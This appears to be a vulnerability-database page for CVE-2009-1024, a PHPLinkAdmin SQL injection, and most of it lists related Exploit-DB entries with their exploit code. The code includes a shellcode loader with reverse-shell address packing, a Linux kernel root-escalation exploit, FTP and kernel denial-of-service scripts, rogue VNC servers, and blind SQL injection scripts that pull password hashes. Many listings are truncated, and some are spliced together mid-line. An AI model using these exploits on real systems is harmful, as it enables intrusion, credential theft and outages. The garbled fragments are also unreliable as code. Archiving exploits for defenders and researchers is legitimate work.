CVE-2009-1024
published 2009-03-20 — CVE-2009-1024: Multiple SQL injection vulnerabilities in Beerwin PHPLinkAdmin 1.0 allow remote attackers to execute arbitrary SQL commands via the linkid parameter to…
PriorityP343high7.5CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS
1.34%
67.8th percentile
Multiple SQL injection vulnerabilities in Beerwin PHPLinkAdmin 1.0 allow remote attackers to execute arbitrary SQL commands via the linkid parameter to edlink.php, and unspecified other vectors.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beerwin | phplinkadmin | — | — |
No detection rules found.
Exploit-DB
Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass
exploitdb·2010-03-05·CVSS 7.5
CVE-2009-4018 [HIGH] Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass
Kolang 4.3.10
// "shellcode loader" : load and execute arbitrary shellcode from a file
// Hamid Ebadi
#define O_RDONLY 00 ; fcntl.h
#define SHELLCODE_MAX_SIZE 1024
// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
void getuid()
{
unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
int fd;
char shellcode[SHELLCODE_MAX_SIZE];
char filename[]=SHELLCODE_FILENAME ;
// we can also pass the shellcode in program's arguments
if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) > 8)&255 );
$port2 = sprintf('%c', ($port>> 0)&255 );
$part = explode('.', $ip);
//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
/*
* linux/x86
Exploit-DB
Home FTP Server - 'MKD' Directory Traversal
exploitdb·2009-11-17
CVE-2009-4053 Home FTP Server - 'MKD' Directory Traversal
Home FTP Server - 'MKD' Directory Traversal
---
#!/usr/bin/python
import socket
import sys
def Usage():
    """Print the command-line usage banner to stdout."""
    banner = (
        "Usage: ./expl.py \n",
        "Example:./expl.py 192.168.48.183 anonymous anonymous\n",
    )
    for line in banner:
        print(line)
# Python 2 only: the `<>` operator and sending str objects to a socket do not
# run under Python 3.
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bare except also catches KeyboardInterrupt.  No timeout is set, so an
# unresponsive host blocks connect() and every recv() below indefinitely.
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
# Banner, then a plain-text USER/PASS login.  Each reply is read into r but
# never inspected, so a rejected login does not stop the script.
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
# The single probe: an MKD whose argument steps above the current directory.
# An FTP server must canonicalise the path and refuse anything outside the
# account's root.  The reply is never read, so this script only sends the
# command; it does not verify the outcome.
sock.send("MKD ../A\r\n")
sock.close()
sys.exit(0);
Exploit-DB
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
exploitdb·2009-11-13
CVE-2009-4108 XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
---
#!/usr/bin/python
import socket
import sys
def Usage():
    """Print the command-line usage banner to stdout."""
    banner = (
        "Usage: ./expl.py \n",
        "Example:./expl.py 192.168.48.183 anonymous anonymous\n",
    )
    for line in banner:
        print(line)
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
so
Exploit-DB
Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service
exploitdb·2009-11-09
CVE-2009-3888 Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service
Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service
---
/*
 * Published PoC body.  The only work here is the static array: 20 * 1024 *
 * 1024 elements of long long (160 MiB with an 8-byte long long) of
 * zero-initialised storage in .bss, whose address is then returned through
 * an int return type (a pointer-to-int mismatch the compiler warns about).
 * No syscall is made explicitly, so the fput() NULL dereference named in
 * the title is presumably triggered by how the kernel handles the oversized
 * image at exec time -- that cannot be verified from this snippet.
 */
int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
return a;
}
Exploit-DB
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
exploitdb·2009-08-31·CVSS 7.8
CVE-2009-2698 [HIGH] Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
Linux Kernel 2.6 .
**
*/
#include
#include
#include
#include
#include
#include
#include
/* Caller's real uid/gid, filled in by main; uid is the pattern that
 * get_root_uid searches for.  gid is not referenced by get_root_uid. */
unsigned int uid, gid;
/*
 * Called from the inline asm in kernel_code with the word found at the
 * 4 KiB-aligned base of the current stack as `task`.  Starting there it
 * walks memory one word at a time until it finds four consecutive words
 * equal to the caller's uid (saved in the global by main), then zeroes that
 * run and the four words after it.  The 4+4 layout is an assumption about
 * the credential fields of the targeted 2.6 kernels, and the scan has no
 * upper bound -- PoC code, not robust code.
 */
void get_root_uid(unsigned *task)
{
unsigned *addr=task;
while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
addr++;
}
addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
return;
}
/* `exploit` is an assembler label inside kernel_code, not a C function;
 * this prototype makes the symbol visible to C code by name. */
void exploit();
/*
 * Holds the `exploit` entry point as an asm label rather than a C function
 * (hence the separate `void exploit();` prototype).  i386-only: on entry it
 * saves %eax, computes the 4 KiB-aligned base of the current stack
 * (%esp & 0xfffff000), pushes the word stored there as the argument to
 * get_root_uid, calls it, drops the argument and restores %eax.  How this
 * code's address reaches the kernel is in main, which is truncated in this
 * listing.
 */
void kernel_code()
{
asm("exploit:\n"
"push %eax\n"
"movl $0xfffff000,%eax\n"
"andl %esp,%eax\n"
"pushl (%eax)\n"
"call get_root_uid\n"
"addl $4,%esp\n"
"popl %eax\n");
return;
}
/* Address of kernel_code kept in a global; its use is in main, which is
 * truncated in this listing. */
void *kernel=kernel_code;
int main(int argc, char **argv)
{
int fd=0;
char buf[1024];
struct sockaddr x0x;
void *zero_page;
uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}
if(personality(0xffffffff)==PER_SVR
Exploit-DB
Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2009-07-13
CVE-2009-3947 Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)
Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)
---
#########################################################################################
# #
# TANDBERG BoF v0.1 - Tandberg MXP F7.0 "%sys.argv[0]
print "[-] Example: python poc.py 192.168.1.23 23\n"
sys.exit(0)
try:
print "[+] Connecting... %s" %sys.argv[1]
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],int(sys.argv[2])))
print "[+] Sending data..."
time.sleep(1.2)
s.send(buff)
print "[+] Deed Done"
s.recv(1024)
except:
print "[#] Unable to connect"
# milw0rm.com [2009-07-13]
Exploit-DB
ToyLog 0.1 - SQL Injection / Remote Code Execution
exploitdb·2009-07-10
CVE-2009-3750 ToyLog 0.1 - SQL Injection / Remote Code Execution
ToyLog 0.1 - SQL Injection / Remote Code Execution
---
--+++=====================================================================================+++--
--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--
--+++=====================================================================================+++--
[+] SQL Injection Vulnerability
Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user
[+] Remote Command Execution Exploit
#!/usr/bin/php
+\n".
"- Ex. : php xpl.php http://localhost/ToyLog/ -\n".
"+ +\n".
"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
"\n");
}
function hex_format ($string) {
$i=0;
while ($i(.+?) on|", fgets ($fp, 1024), $data))
$path = $data [1];
list ($path) = explode
Exploit-DB
Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service
exploitdb·2009-05-29
CVE-2009-1961 Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service
Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service
---
/*
source: https://www.securityfocus.com/bid/35143/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an affected process to hang, denying service to legitimate users. Other denial-of-service attacks are also possible.
This issue was introduced in Linux Kernel 2.6.19. The following versions have been fixed:
Linux Kernel 2.6.30-rc3
Linux Kernel 2.6.27.24
Linux Kernel 2.6.29.4
*/
pipe(pfds);
snprintf(buf, sizeof(buf), "/tmp/%d", getpid());
fd = open(buf, O_RDWR | O_CREAT, S_IRWXU);
if (fork()) {
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
} else{
sleep(1);
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
}
Exploit-DB
Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
exploitdb·2009-05-04
CVE-2009-1478 Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
---
/* solaris-dtrace-dos.c
*
* Copyright (c) 2008 by
*
* Solaris >= 10/Opensolaris local kernel DoS POC
* by mu-b - Mon 17 Nov 2008
*
* - Tested on: Sun Solaris 10 (SPARC)
* Sun OpenSolaris
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Device path used by the PoC; the open() is in the truncated part of main. */
#define DTRACE_HELPER "/dev/dtrace/helper"
/* Number of header rewrites performed by hammer().  A progress counter only;
 * it is incremented without any synchronisation. */
static unsigned int changes = 0;
/*
 * Thread body (presumably a pthread_create target -- main declares `tid`
 * but is truncated here): loops forever rewriting the DOF header's
 * load-size field to -1 (all bits set) and bumping the `changes` counter,
 * with a 10 us pause per round.  The header is presumably the same one
 * main submits to the dtrace helper device concurrently; that cannot be
 * confirmed from the visible lines.  Never returns despite the void *
 * signature.
 */
void *
hammer (void *arg)
{
struct dof_hdr *phdr;
phdr = arg;
while (1)
{
phdr->dofh_loadsz = -1;
changes++;
usleep (10);
}
}
int
main (int argc, char **argv)
{
union {
struct dof_hdr hdr;
unsigned char buf[256*1024];
} hdr_t;
struct dof_hdr *phdr;
int i, fd, n, tid;
printf ("Solaris >= 10/Opensolaris local kernel DoS PoC\n"
"by: \n"
"http://www.digit-labs.org/ -- D
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
---
/* xnu-profil-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
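/* profil defines */
/* Iteration count for the fill loop in main.  Parenthesised so the macro
 * expands correctly in any expression (the original `65536 * 128` was
 * unparenthesised; safe in the `* 32` and `<` uses below, but a latent
 * precedence bug for any other use). */
#define PROFIL_LEAK_NUM (65536 * 128)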
int
main (int argc, char **argv)
{
char buf[1024];
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
printf ("* opening profil, pid: %d...", getpid ());
if ((n = syscall (SYS_profil, &buf, sizeof buf, 0, 1)) < 0)
{
fprintf (stderr, "\n%s: syscall [SYS_profil]: failed: %d\n",
argv[0], n);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("* filling %d-bytes of kernel memory...\n", PROFIL_LEAK_NUM * 32);
fflush (stdout);
for (i = 0; i < PROFIL_LEAK_NUM; i++)
{
if ((n = syscall (SYS_
Exploit-DB
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1238 Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
---
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Thread body passed to pthread_create in main (that expects a function
 * returning void *; this one is declared void).  Each round builds a
 * six-element sysctl MIB -- CTL_VFS, 17, HFS_SET_PKG_EXTENSIONS, the
 * address of a 256 KiB zeroed buffer cast to int (only valid for 32-bit
 * pointers), a length of 1024 and a random count in 1..254 -- and calls
 * sysctl() with no old/new value pointers, ignoring the return value.
 * Loops forever with a 10 us pause.
 */
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating ham
Exploit-DB
Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection
exploitdb·2009-03-16
CVE-2009-1025 Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection
Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection
---
#######################################################################################################################
[+] Beerwin's PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#######################################################################################################################
[+] Download : http://www.downloads.beerwin.com/index.php?p=showdl&dl=16&cat=18
[+] Remote File Inclusion
Direct access to linkadmin. No authentication required.
Vulnerable code in linkadmin.php :
// $page is whatever the client supplied (GET, POST or cookie, via
// $_REQUEST) and reaches include with no validation, so any readable
// local file -- or, with allow_url_include enabled, a remote URL -- is
// executed.  Fix: look $page up in a fixed allowlist of page names and
// include only the mapped file.
$page = $_REQUEST['page'];
if (!$page){
echo "Welcome to the PHPLINKADMIN!. Please select an action from
the left menu.";
}else{
include $page;
}
PoC :
http://127.0.0.1
Exploit-DB
TightVNC - Authentication Failure Integer Overflow (PoC)
exploitdb·2009-02-09·CVSS 10.0
CVE-2009-0388 [CRITICAL] TightVNC - Authentication Failure Integer Overflow (PoC)
TightVNC - Authentication Failure Integer Overflow (PoC)
---
#!/usr/bin/env python
#[email protected]
# Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388
import socket
# The PoC acts as a rogue VNC server: bind every interface on the standard
# VNC port and accept one client at a time (backlog 1).  What it sends to a
# connecting client is in the loop below.
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x02\x02\x10'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = '\x00'*4
clientsocket.sendall(data)
data = ('\x00'*3)+'\x01'
clientsocket.sendall(data)
data = ('\x00'*3)+'\x02STDVVNCAUTH_'
clientsocket.sendall(data)
data_cli = clientsocket.r
Exploit-DB
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
exploitdb·2009-02-04
CVE-2009-0388 UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
---
#!/usr/bin/env python
# POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568
#Author: Andres Lopez Luksenberg (Visit: http://208.66.16.113/~andres/)
#
import socket
# The PoC acts as a rogue VNC server: bind every interface on the standard
# VNC port and accept one client at a time (backlog 1).  What it sends to a
# connecting client is in the loop below.
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
print "Author: Andres Lopez Luksenberg (Visit: http://208.66.16.113/~andres/)"
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.003\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x00'
clientsocket.sendall(data)
data = '\x00\x00\x00\x75'
clientsocket.sendall(data)
data = '\x00' * int(0xffffff)
clientsocket
Exploit-DB
SmartSiteCMS 1.0 - Blind SQL Injection
exploitdb·2009-01-28
CVE-2009-0405 SmartSiteCMS 1.0 - Blind SQL Injection
SmartSiteCMS 1.0 - Blind SQL Injection
---
#!/usr/bin/python
import sys
import re
from socket import *
class exploit:
def __init__(self, host: str, path: str, user: str) -> None:
# Target host, URL path prefix and the account whose password column the
# blind probes built in set_query() read; all three are string-concatenated
# into the request.
self.host=host
self.path=path
self.user=user
# An empty pattern matches at offset 0 of any input, so check()'s search()
# always hits the very start of the raw response.
self.reg=re.compile("")
def set_query(self, n: int, ch: str) -> None:
# Boolean-based blind probe for candidate character ch at position n of
# the password column; presumably articles.php renders differently depending
# on whether the comparison holds.  Only space and single quote are
# percent-encoded; the rest of the payload is sent as typed.  The
# server-side fix is a parameterised query on the var parameter.
self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
self.query = self.query.replace(" ","%20")
self.query = self.query.replace("'","%27")
# Raw HTTP/1.0 request sent verbatim by check().
self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
def check(self):
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((self.host, 80))
sock.send(self.request)
r=""
t="-"
while(t!=""):
t=sock.recv(1024)
r+=t
match=self.reg.search(r)
if(r[match.start()+27:match.start()+59]!=""
Exploit-DB
Pardal CMS 0.2.0 - Blind SQL Injection
exploitdb·2009-01-22
CVE-2009-0279 Pardal CMS 0.2.0 - Blind SQL Injection
Pardal CMS 0.2.0 - Blind SQL Injection
---
--+++=============================================================+++--
--+++====== Pardal CMS ".
"\n[+] Ex. : php xpl.php localhost /PardalCMS Admin".
"\n\n";
exit ();
}
/*
 * Builds the boolean-based blind probe for one (position, candidate
 * character) pair.  $chr is expected to be an ordinal already (exploit()
 * below calls ord() before passing it).  Only space and single quote are
 * percent-encoded; everything else goes into the URL as-is.  On the
 * application side the injection point is the id parameter of
 * comentar.php; the fix there is a prepared statement or an integer cast.
 */
function query ($user, $chr, $pos)
{
$query = "x' OR ASCII(SUBSTRING((SELECT senha FROM users WHERE login = '{$user}'),{$pos},1))='{$chr}";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}
function exploit ($hostname, $path, $user, $pos, $chr)
{
$chr = ord ($chr);
$fp = fsockopen ($hostname, 80);
$query = query ($user, $chr, $pos);
$request = "GET {$path}/comentar.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $request);
while (!feof ($fp))
$reply .= fgets ($fp, 1024);
f
No writeups or analysis indexed.
http://osvdb.org/52778
http://secunia.com/advisories/34323
http://www.securityfocus.com/bid/34129
http://www.vupen.com/english/advisories/2009/0733
https://exchange.xforce.ibmcloud.com/vulnerabilities/49265
https://www.exploit-db.com/exploits/8216
2009-03-20
Published